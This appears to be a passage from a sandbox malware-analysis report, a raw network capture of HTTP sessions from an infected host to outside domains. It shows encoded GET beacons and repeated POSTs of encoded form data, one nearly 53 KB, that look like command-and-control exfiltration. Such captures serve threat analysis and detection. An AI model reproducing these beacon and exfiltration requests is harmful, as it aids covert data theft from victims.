                                                            Jul 3, 2024 17:41:09.955060005 CEST3867OUTData Raw: 61 4a 50 7a 4d 4b 6e 6e 57 43 6d 38 79 46 68 58 76 50 6e 79 5a 77 48 6d 35 2b 6f 65 69 78 31 61 30 7a 52 62 57 44 65 75 4b 59 71 37 77 44 6a 71 52 42 44 76 58 73 54 63 48 42 77 51 74 41 73 33 44 6d 4a 38 39 55 7a 51 43 74 31 54 6d 53 31 39 53 2f
                                                            Data Ascii: aJPzMKnnWCm8yFhXvPnyZwHm5+oeix1a0zRbWDeuKYq7wDjqRBDvXsTcHBwQtAs3DmJ89UzQCt1TmS19S/f6j2L0ry09d2f6NFS8SRGZ7Jxd6V0VS/T8peIjLqko0k/TDfSZS6/+Db4zVyXEHmJxa4WGX72+I1Cqx/h34xsiHtfDujIGZLL1rfDG90XvlBZ1rwACkH6RoLgbv2NiqoOn6qCk0AW/xz3U5lR7tkrx/7KRqcULO/T
                                                            Jul 3, 2024 17:41:09.955136061 CEST6445OUTData Raw: 4a 4d 4f 71 48 50 67 46 69 30 59 55 39 34 62 55 2b 70 75 46 74 38 69 2f 7a 74 6f 51 4c 63 5a 43 42 4a 76 69 73 73 6e 6e 65 79 53 71 78 41 6d 56 67 33 66 68 74 58 71 71 4c 73 46 4e 73 37 71 73 6f 4a 71 55 74 39 74 34 37 6d 33 53 67 69 39 75 4f 35
                                                            Data Ascii: JMOqHPgFi0YU94bU+puFt8i/ztoQLcZCBJvissnneySqxAmVg3fhtXqqLsFNs7qsoJqUt9t47m3Sgi9uO5rdphsWkDAVLWPdyH1s/KJwYeCWZ00slQbaPl5No+Jfu7+nzv9vxiIuq7TdO5dOLFtMLw3ZMeKPGf5/Bd3jFqpCu5ySlcB6PWvovmMHsSn+GJwZhW3pFuk70ylzfBHgvAPgQU/8eKfN3egQPmZdvv50QOr9xlYYuhy
                                                            Jul 3, 2024 17:41:10.073859930 CEST2578OUTData Raw: 6d 39 74 66 62 2b 47 63 2b 6f 63 52 79 52 4d 64 65 4a 34 52 75 39 6b 4c 2b 36 74 33 62 79 4f 49 78 4a 32 6a 54 57 4f 58 36 69 51 2b 59 76 79 4b 52 50 6c 55 6b 34 2f 4a 4f 41 35 2f 53 43 75 76 52 30 4f 4b 48 43 51 44 56 64 2f 70 4e 67 55 78 4e 4b
                                                            Data Ascii: m9tfb+Gc+ocRyRMdeJ4Ru9kL+6t3byOIxJ2jTWOX6iQ+YvyKRPlUk4/JOA5/SCuvR0OKHCQDVd/pNgUxNKvs0Bg38r6VxPs7QFxnUkp3qL1kw2r0wZW5jlxXI1gw61+zxsL4VZ1xyNxMRUeiqpyVVnHanyHES4rieZIbT3dWluOO6nKrkpjaDxGgTTEMkZn3WRCVPpaBIfv287+Vow8BOATozhpGTs4uCFpibhcdybBWEqEOB3s
                                                            Jul 3, 2024 17:41:10.074006081 CEST2578OUTData Raw: 47 30 61 44 78 6e 36 62 74 62 34 57 65 4a 55 59 43 51 55 62 68 69 34 63 59 6d 64 6a 52 71 38 69 2b 38 2b 68 73 68 67 5a 67 6c 7a 34 6b 65 53 37 50 71 77 2b 6a 6f 42 65 77 37 57 48 36 69 4a 79 67 2f 6d 58 49 37 68 6a 56 37 57 32 66 69 50 65 56 37
                                                            Data Ascii: G0aDxn6btb4WeJUYCQUbhi4cYmdjRq8i+8+hshgZglz4keS7Pqw+joBew7WH6iJyg/mXI7hjV7W2fiPeV7omvet26syTxAQr5hHtmBsCrIKzrehCHkqsSdPehXkaD9UiUp54z9s0dZ9Hd52jpwcOmiNDxqynLFU0ITF9LSb58nJ5nNjVqXNIehg2TX/Wb+9HT7DxKAxs2hW53l641xqhqYoGAiwdnRNspf6qijI5f8C8wMFLiEv
                                                            Jul 3, 2024 17:41:10.074182034 CEST5156OUTData Raw: 7a 39 2b 31 67 2b 45 38 56 48 76 6c 67 34 7a 69 2b 72 62 6b 50 44 31 69 46 58 39 6b 41 62 44 2b 33 63 64 6c 4b 67 4f 50 4d 77 57 6e 49 48 56 53 4f 34 76 4c 32 44 6e 57 65 65 7a 56 45 71 59 52 36 4a 6c 48 53 43 44 52 73 50 45 57 62 58 2b 6e 67 67
                                                            Data Ascii: z9+1g+E8VHvlg4zi+rbkPD1iFX9kAbD+3cdlKgOPMwWnIHVSO4vL2DnWeezVEqYR6JlHSCDRsPEWbX+nggjdz7K7z0m942KVva+ictHkQEzhbm1CCAlebXUllQvLXSLhndxaisCew+V9yf/4YSPDuS3yjqi1A9sTKpC5zxraCdNK7hFSD8jQx7SOL5Jq2I2Iw1kZlttk38/P6x0TrGPJ867kl3q16Q9bKJjz8MzlcZh1Qs0g71L
                                                            Jul 3, 2024 17:41:10.074352026 CEST5156OUTData Raw: 57 79 33 42 72 45 4a 72 51 42 48 48 42 78 33 62 68 6c 73 2f 55 38 5a 78 6f 35 77 45 65 46 76 55 54 2f 4a 79 7a 4b 79 52 73 34 54 32 69 6b 54 30 44 2b 75 33 61 75 55 31 68 4a 68 6e 77 68 69 2f 30 6a 69 53 52 6b 75 73 37 47 76 30 44 49 4a 55 37 55
                                                            Data Ascii: Wy3BrEJrQBHHBx3bhls/U8Zxo5wEeFvUT/JyzKyRs4T2ikT0D+u3auU1hJhnwhi/0jiSRkus7Gv0DIJU7UepW0OCv/B4REpybeiAHAqcw4LVZkwCFCRNO6SK+Y1hJ28gGWpyK6loqedHJir1D5rEYJZd8QET5Nxv5p7q7MI8lfJPzfDcmSMPtv97KTzFVN+JmbhIN9N1f+Nw5P+sa5hethqMmTr8vJST8O48FqPUdcshzVk6+q6
                                                            Jul 3, 2024 17:41:10.074527979 CEST10312OUTData Raw: 59 4b 68 2b 51 43 4a 41 4a 78 36 71 42 55 33 50 57 6c 6d 70 76 58 62 71 69 2f 41 69 66 66 69 70 77 52 62 58 41 38 71 30 37 6e 50 42 74 52 30 57 4c 33 48 69 64 6c 71 75 6d 45 7a 52 6a 7a 39 4d 51 68 58 33 37 79 65 73 52 52 51 7a 75 6e 5a 4e 46 51
                                                            Data Ascii: YKh+QCJAJx6qBU3PWlmpvXbqi/AiffipwRbXA8q07nPBtR0WL3HidlqumEzRjz9MQhX37yesRRQzunZNFQDHTi9dIYnJxYdqGN+MRqkzegCNVRuWjJAdKiavO4sfkbNQAJ9pzmqFUTlSY6E/pOp8dP7/anmm19utjC+IvlyMSm1YRdZNzwx8I893c7kBD4pObSXHzytRV9knX84dGyrdLARu2P5hE6nRbdd4doaOkSmGto7Zrav
                                                            Jul 3, 2024 17:41:10.193130970 CEST1289OUTData Raw: 43 62 78 68 61 65 6f 75 34 2b 48 6e 64 2b 54 36 4e 6c 6f 4a 55 2b 37 77 46 62 35 70 6e 56 73 75 64 41 54 75 56 64 50 32 52 2f 41 51 6f 76 58 32 6c 59 59 4c 45 4e 79 52 36 64 51 76 34 30 77 41 4c 70 50 77 73 65 6b 56 6a 76 37 6b 33 4f 51 6c 77 39
                                                            Data Ascii: Cbxhaeou4+Hnd+T6NloJU+7wFb5pnVsudATuVdP2R/AQovX2lYYLENyR6dQv40wALpPwsekVjv7k3OQlw9Yd70i6OBsV2Rd13H14oGsXZBOet2dj+4RSJMJj4MUPJYu3n6/+2mTR/nmcZhk75d5l9rxqGTDJBiUYLXLNV8uOrk5lgirjSGkcnoX0wyj4D/zmB3jhAQbofmOyq+mrMrLB8SwO9T2kFalH+CBn412SIhgcqab1ydG
                                                            Jul 3, 2024 17:41:10.193180084 CEST3867OUTData Raw: 4e 32 47 59 33 55 77 69 64 34 42 67 39 47 56 41 6f 61 73 76 64 59 75 71 75 33 4f 79 48 73 54 47 69 54 64 38 6e 56 4c 39 61 74 70 49 6e 61 34 45 43 35 77 53 45 77 67 79 62 56 77 51 50 2f 4b 67 32 4e 70 79 42 45 39 79 77 74 6f 6b 5a 49 32 35 50 6d
                                                            Data Ascii: N2GY3Uwid4Bg9GVAoasvdYuqu3OyHsTGiTd8nVL9atpIna4EC5wSEwgybVwQP/Kg2NpyBE9ywtokZI25PmttfSII4IYevqAiDIGI3IbqrBCrAqsW6UkhUQvSfi0i/rDljYPgrrYvCcrl2cZeQzRN4334+D5u/lyhthZdjM7GTp4ryLRjYPmD/8KkBK5CAtH13+Dkr/VFd5YgQ7+EyJyTuC9wTdrcT0c06O39Dj4cg0BhTp9A2he
                                                            Jul 3, 2024 17:41:10.193227053 CEST1289OUTData Raw: 4e 62 5a 31 59 55 55 2b 7a 6a 48 4c 65 72 4a 50 65 5a 4c 4e 70 36 54 34 6f 6a 6a 2f 6c 37 2b 44 6b 35 41 43 57 5a 79 53 50 39 79 62 46 64 71 62 4e 45 73 44 2b 4e 48 48 71 6a 79 51 4f 71 38 7a 4f 4a 43 63 71 2f 75 75 57 4d 41 54 4f 35 66 7a 34 6a
                                                            Data Ascii: NbZ1YUU+zjHLerJPeZLNp6T4ojj/l7+Dk5ACWZySP9ybFdqbNEsD+NHHqjyQOq8zOJCcq/uuWMATO5fz4jiRGEF7kapvyKI23a8IAUP1Pm0v+y2X3D6ZmfGOPPSEytpAsTwZjMouM2kRRki78ZhGBNAqW6kgQ630vRrO6JJfNF1fdAjWU0fxPN1CRI/f/0VGcGZxwIbjQnakljAek7K4vX6IyTd1t0Bse0qHWH6vHN+BIIZIc0a


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            48192.168.11.20498233.33.130.19080
                                                            TimestampBytes transferredDirectionData
                                                            Jul 3, 2024 17:41:12.622332096 CEST522OUTGET /tq5r/?vX=2ahlOPqFbaLRJ59RJMyuJ7IfIQg9pPTz0C4c2znY6LEO/TCdmpUdsfBsLge4LzAAnPKkz9TLh65OzxMJqcN49ZYZ04DS6e4TLs38paEuEBs4iPeVqFZufcc=&_B7=LxyxWrj8kri0gh HTTP/1.1
                                                            Host: www.selllaptop.org
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.5
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
                                                            Jul 3, 2024 17:41:12.766969919 CEST397INHTTP/1.1 200 OK
                                                            Server: openresty
                                                            Date: Wed, 03 Jul 2024 15:41:12 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 257
                                                            Connection: close
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 76 58 3d 32 61 68 6c 4f 50 71 46 62 61 4c 52 4a 35 39 52 4a 4d 79 75 4a 37 49 66 49 51 67 39 70 50 54 7a 30 43 34 63 32 7a 6e 59 36 4c 45 4f 2f 54 43 64 6d 70 55 64 73 66 42 73 4c 67 65 34 4c 7a 41 41 6e 50 4b 6b 7a 39 54 4c 68 36 35 4f 7a 78 4d 4a 71 63 4e 34 39 5a 59 5a 30 34 44 53 36 65 34 54 4c 73 33 38 70 61 45 75 45 42 73 34 69 50 65 56 71 46 5a 75 66 63 63 3d 26 5f 42 37 3d 4c 78 79 78 57 72 6a 38 6b 72 69 30 67 68 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?vX=2ahlOPqFbaLRJ59RJMyuJ7IfIQg9pPTz0C4c2znY6LEO/TCdmpUdsfBsLge4LzAAnPKkz9TLh65OzxMJqcN49ZYZ04DS6e4TLs38paEuEBs4iPeVqFZufcc=&_B7=LxyxWrj8kri0gh"}</script></head></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            49192.168.11.204982474.208.236.3880
                                                            TimestampBytes transferredDirectionData
                                                            Jul 3, 2024 17:41:21.068289042 CEST520OUTGET /9m56/?_B7=LxyxWrj8kri0gh&vX=wSNNrhltoDErcnEzxm9/w28Dp1eoX3XTDY+0HSDY/xjQqFM+lgiwoO0LpiVzuA8Bz+prc1fM5Kq2+VzXMkRPAHQ+fn8FfBllirngXHZ4XxgzDhA7JZPwDGY= HTTP/1.1
                                                            Host: www.costmoon.com
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.5
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
                                                            Jul 3, 2024 17:41:21.202608109 CEST770INHTTP/1.1 404 Not Found
                                                            Content-Type: text/html
                                                            Content-Length: 626
                                                            Connection: close
                                                            Date: Wed, 03 Jul 2024 15:41:21 GMT
                                                            Server: Apache
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 [TRUNCATED]
                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Your browser can't find the document corresponding to the URL you typed in. </p> </body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            50192.168.11.2049825142.202.6.23080
                                                            TimestampBytes transferredDirectionData
                                                            Jul 3, 2024 17:41:26.425379038 CEST788OUTPOST /hqcp/ HTTP/1.1
                                                            Host: www.6171nvuhb.rent
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.5
                                                            Accept-Encoding: gzip, deflate, br
                                                            Origin: http://www.6171nvuhb.rent
                                                            Referer: http://www.6171nvuhb.rent/hqcp/
                                                            Content-Length: 199
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
                                                            Data Raw: 76 58 3d 58 35 78 77 45 6f 74 53 56 2f 52 53 53 33 4c 58 75 4e 6a 30 32 38 72 30 69 38 76 63 2f 42 30 2f 79 43 66 34 47 66 46 73 45 4b 75 31 79 79 61 67 34 34 53 56 67 46 2b 62 32 41 2f 70 59 79 6b 4f 77 66 4c 77 61 70 4b 4c 36 37 76 6c 72 62 44 72 58 6b 62 6b 45 78 37 41 32 61 56 41 66 6d 4e 62 6d 45 6b 37 52 78 31 38 34 74 68 6e 2b 79 2b 5a 6b 42 50 6d 4d 6d 57 6b 4b 6f 72 6b 45 73 66 42 2b 49 76 74 51 6b 74 6c 79 50 4f 4c 32 7a 55 39 52 74 44 30 38 56 42 6f 68 5a 69 41 70 62 4c 76 46 54 49 4b 59 59 2b 67 4b 62 31 58 53 61 66 54 6b 32 65 6c 50 49 45 4c 67 45 4a 4b 46 76 2f 31 58 41 3d 3d
                                                            Data Ascii: vX=X5xwEotSV/RSS3LXuNj028r0i8vc/B0/yCf4GfFsEKu1yyag44SVgF+b2A/pYykOwfLwapKL67vlrbDrXkbkEx7A2aVAfmNbmEk7Rx184thn+y+ZkBPmMmWkKorkEsfB+IvtQktlyPOL2zU9RtD08VBohZiApbLvFTIKYY+gKb1XSafTk2elPIELgEJKFv/1XA==
                                                            Jul 3, 2024 17:41:27.581568956 CEST715INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Wed, 03 Jul 2024 15:41:27 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Vary: Accept-Encoding
                                                            Content-Encoding: gzip
                                                            Data Raw: 31 66 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 53 dd 6f da 30 10 7f e7 af f0 fc 14 24 e2 7c 92 84 02 9d 80 81 d4 0e 51 4d a5 7d a1 11 72 1c a7 09 25 09 b2 9d 35 5b cb ff be cb c2 36 b4 ee b9 5a a4 cb f9 ce 77 f7 3b df c7 48 32 91 1d 14 62 29 15 92 ab 31 be 5b 2f f4 00 a3 2c 1e e3 e5 64 3b bb 59 2e e7 b3 35 46 52 b0 31 36 0c 19 3f 91 be 45 f6 d4 d8 49 1d 04 fd 20 4a 92 67 05 d9 49 7c 39 32 da 60 97 9d d1 e9 b0 9c 90 ac c8 94 f6 92 c5 17 d8 b9 9a ca fb 5b 61 d7 37 93 d9 d5 fd f5 1d ee b1 a7 7f 68 8f dd b7 71 3a 5f a9 40 db 34 57 68 dc b2 d7 57 b4 09 87 1d 2d a9 0a a6 b2 b2 d0 ba e8 a5 83 50 63 96 e6 60 14 97 ac ca 79 a1 08 13 9c 2a 3e df f3 46 d2 70 9b 17 ee 0e c1 38 cd 09 bc 0a 8c 71 aa d4 41 5e 18 06 68 22 9a c5 15 61 65 de 08 3b f9 31 30 4d c6 12 db 77 99 43 fb 03 87 3a 5e df e1 1e 65 51 12 c1 8d cf 70 13 a9 81 95 e7 a8 8f 5c 9d 20 e5 f4 db 9a 3e ae 68 ce ff 80 6f cc 70 88 c0 4d 92 03 15 90 d6 aa 8c 39 d4 49 72 a1 a6 3c 29 05 d7 d2 bc 87 24 24 79 ec 6a f0 3f ab c7 07 5d b7 74 fd 77 81 df a3 6d 9f [TRUNCATED]
                                                            Data Ascii: 1f2So0$|QM}r%5[6Zw;H2b)1[/,d;Y.5FR16?EI JgI|92`[a7hq:_@4WhW-Pc`y*>Fp8qA^h"ae;10MwC:^eQp\ >hopM9Ir<)$$yj?]twm^zXymoW"6|q.aqPs~JRJS8%aaIUf5k|6f@ z}jl@]i{s[".7i0`Hq!|(Y7B0


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            51192.168.11.2049826142.202.6.23080
                                                            TimestampBytes transferredDirectionData
                                                            Jul 3, 2024 17:41:29.155994892 CEST1128OUTPOST /hqcp/ HTTP/1.1
                                                            Host: www.6171nvuhb.rent
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.5
                                                            Accept-Encoding: gzip, deflate, br
                                                            Origin: http://www.6171nvuhb.rent
                                                            Referer: http://www.6171nvuhb.rent/hqcp/
                                                            Content-Length: 539
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
                                                            Data Raw: 76 58 3d 58 35 78 77 45 6f 74 53 56 2f 52 53 55 6e 37 58 74 71 50 30 6d 73 72 31 74 63 76 63 74 42 30 37 79 43 54 34 47 66 74 61 44 38 47 31 79 51 43 67 71 70 53 56 68 46 2b 62 2b 67 2f 73 63 79 6b 48 77 66 57 44 61 74 43 4c 36 2f 48 6c 71 75 58 72 47 45 62 6a 4d 52 37 48 78 61 56 42 4f 32 4e 52 6d 45 6f 6e 52 30 56 38 34 62 56 6e 35 33 69 5a 67 51 50 6e 4c 47 57 69 64 59 72 6c 66 63 66 31 2b 49 53 59 51 67 68 66 79 39 53 4c 31 58 59 39 53 74 44 7a 32 6c 41 67 70 35 6a 57 34 36 32 68 49 69 59 70 65 6f 32 2b 54 4b 4a 4a 52 71 6e 4e 71 77 61 57 65 4b 6b 53 6f 58 55 61 51 65 54 34 43 77 30 43 65 6b 50 51 52 31 54 47 69 43 53 70 31 6a 46 32 41 56 6c 4b 44 2f 34 54 4f 64 4b 73 70 4c 54 67 74 4a 5a 55 73 7a 67 63 37 35 61 55 56 61 36 6f 4f 4d 6a 76 54 6c 43 52 4a 4f 36 6d 59 59 43 5a 37 50 75 47 6f 66 51 61 42 55 64 58 6a 35 78 56 70 4c 70 49 4e 56 4c 5a 6f 6e 62 58 65 4a 4a 63 55 5a 67 39 62 46 45 47 30 6c 55 68 6d 35 71 6f 59 6b 47 6f 34 75 44 45 54 67 6f 38 32 6e 71 64 4c 72 6a 48 69 4f 47 77 54 65 5a [TRUNCATED]
                                                            Data Ascii: vX=X5xwEotSV/RSUn7XtqP0msr1tcvctB07yCT4GftaD8G1yQCgqpSVhF+b+g/scykHwfWDatCL6/HlquXrGEbjMR7HxaVBO2NRmEonR0V84bVn53iZgQPnLGWidYrlfcf1+ISYQghfy9SL1XY9StDz2lAgp5jW462hIiYpeo2+TKJJRqnNqwaWeKkSoXUaQeT4Cw0CekPQR1TGiCSp1jF2AVlKD/4TOdKspLTgtJZUszgc75aUVa6oOMjvTlCRJO6mYYCZ7PuGofQaBUdXj5xVpLpINVLZonbXeJJcUZg9bFEG0lUhm5qoYkGo4uDETgo82nqdLrjHiOGwTeZbqdAHT6UK0NhJqiQRy/xqbLZfbb4Kw+rSFCu1jHJvJv5GEQgm0HVdQiHnmQ+LIgopDfvBvjG9rbCWcAgynPR09MduvdjS8Txb0/VIkJnZW5l5iauu0CgPd0VSMF36X2ep1FVt8QNnkdnnSK0JFdb7OVByx+nZjjMFCjrj7sfjxflgAqLvl4J8ud5x5JLNnXHbwmM3Vvo=
                                                            Jul 3, 2024 17:41:30.329432011 CEST715INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Wed, 03 Jul 2024 15:41:30 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Vary: Accept-Encoding
                                                            Content-Encoding: gzip
                                                            Data Raw: 31 66 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 53 dd 6f da 30 10 7f e7 af f0 fc 14 24 e2 7c 92 84 02 9d 80 81 d4 0e 51 4d a5 7d a1 11 72 1c a7 09 25 09 b2 9d 35 5b cb ff be cb c2 36 b4 ee b9 5a a4 cb f9 ce 77 f7 3b df c7 48 32 91 1d 14 62 29 15 92 ab 31 be 5b 2f f4 00 a3 2c 1e e3 e5 64 3b bb 59 2e e7 b3 35 46 52 b0 31 36 0c 19 3f 91 be 45 f6 d4 d8 49 1d 04 fd 20 4a 92 67 05 d9 49 7c 39 32 da 60 97 9d d1 e9 b0 9c 90 ac c8 94 f6 92 c5 17 d8 b9 9a ca fb 5b 61 d7 37 93 d9 d5 fd f5 1d ee b1 a7 7f 68 8f dd b7 71 3a 5f a9 40 db 34 57 68 dc b2 d7 57 b4 09 87 1d 2d a9 0a a6 b2 b2 d0 ba e8 a5 83 50 63 96 e6 60 14 97 ac ca 79 a1 08 13 9c 2a 3e df f3 46 d2 70 9b 17 ee 0e c1 38 cd 09 bc 0a 8c 71 aa d4 41 5e 18 06 68 22 9a c5 15 61 65 de 08 3b f9 31 30 4d c6 12 db 77 99 43 fb 03 87 3a 5e df e1 1e 65 51 12 c1 8d cf 70 13 a9 81 95 e7 a8 8f 5c 9d 20 e5 f4 db 9a 3e ae 68 ce ff 80 6f cc 70 88 c0 4d 92 03 15 90 d6 aa 8c 39 d4 49 72 a1 a6 3c 29 05 d7 d2 bc 87 24 24 79 ec 6a f0 3f ab c7 07 5d b7 74 fd 77 81 df a3 6d 9f [TRUNCATED]
                                                            Data Ascii: 1f2So0$|QM}r%5[6Zw;H2b)1[/,d;Y.5FR16?EI JgI|92`[a7hq:_@4WhW-Pc`y*>Fp8qA^h"ae;10MwC:^eQp\ >hopM9Ir<)$$yj?]twm^zXymoW"6|q.aqPs~JRJS8%aaIUf5k|6f@ z}jl@]i{s[".7i0`Hq!|(Y7B0


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            52192.168.11.2049827142.202.6.23080
                                                            TimestampBytes transferredDirectionData
                                                            Jul 3, 2024 17:41:31.874810934 CEST2578OUTPOST /hqcp/ HTTP/1.1
                                                            Host: www.6171nvuhb.rent
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.5
                                                            Accept-Encoding: gzip, deflate, br
                                                            Origin: http://www.6171nvuhb.rent
                                                            Referer: http://www.6171nvuhb.rent/hqcp/
                                                            Content-Length: 52927
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
                                                            Data Raw: 76 58 3d 58 35 78 77 45 6f 74 53 56 2f 52 53 55 6e 37 58 74 71 50 30 6d 73 72 31 74 63 76 63 74 42 30 37 79 43 54 34 47 66 74 61 44 38 4f 31 79 6a 4b 67 34 61 36 56 69 46 2b 62 77 41 2f 74 63 79 6c 46 77 66 4f 63 61 74 47 62 36 39 2f 6c 71 2f 48 72 47 57 6a 6a 4a 52 37 43 74 4b 56 50 66 6d 4e 46 6d 45 6b 4e 52 30 42 4b 34 72 4a 6e 2b 77 6d 5a 6c 6a 6e 6d 52 32 57 6b 64 59 72 68 4f 4d 66 58 2b 49 6d 49 51 67 6c 66 79 2b 32 4c 33 6c 51 39 42 75 62 7a 2f 56 41 76 6e 5a 6a 4e 69 4b 32 41 49 69 38 39 65 6f 32 75 54 4c 4e 4a 52 74 7a 4e 72 33 47 56 65 71 6b 53 6d 33 55 5a 42 4f 65 2f 43 77 34 61 65 6e 54 51 52 31 4c 47 6a 69 53 70 6c 58 5a 31 48 31 6c 4d 48 2f 34 36 59 74 33 41 70 4c 58 53 74 49 39 55 74 44 63 63 30 6f 61 55 47 4c 36 6f 41 4d 6a 74 4f 56 44 4c 43 75 36 41 59 5a 7a 6c 37 4d 6e 78 6f 59 49 61 41 32 56 58 6d 59 78 61 67 4c 70 4f 49 56 4c 4d 73 6e 48 54 65 4a 59 44 55 5a 67 58 62 42 55 47 7a 55 6b 68 33 4e 47 72 62 30 48 42 73 65 44 4b 61 41 73 71 32 6e 65 46 4c 6f 7a 70 69 50 53 77 51 2b 5a [TRUNCATED]
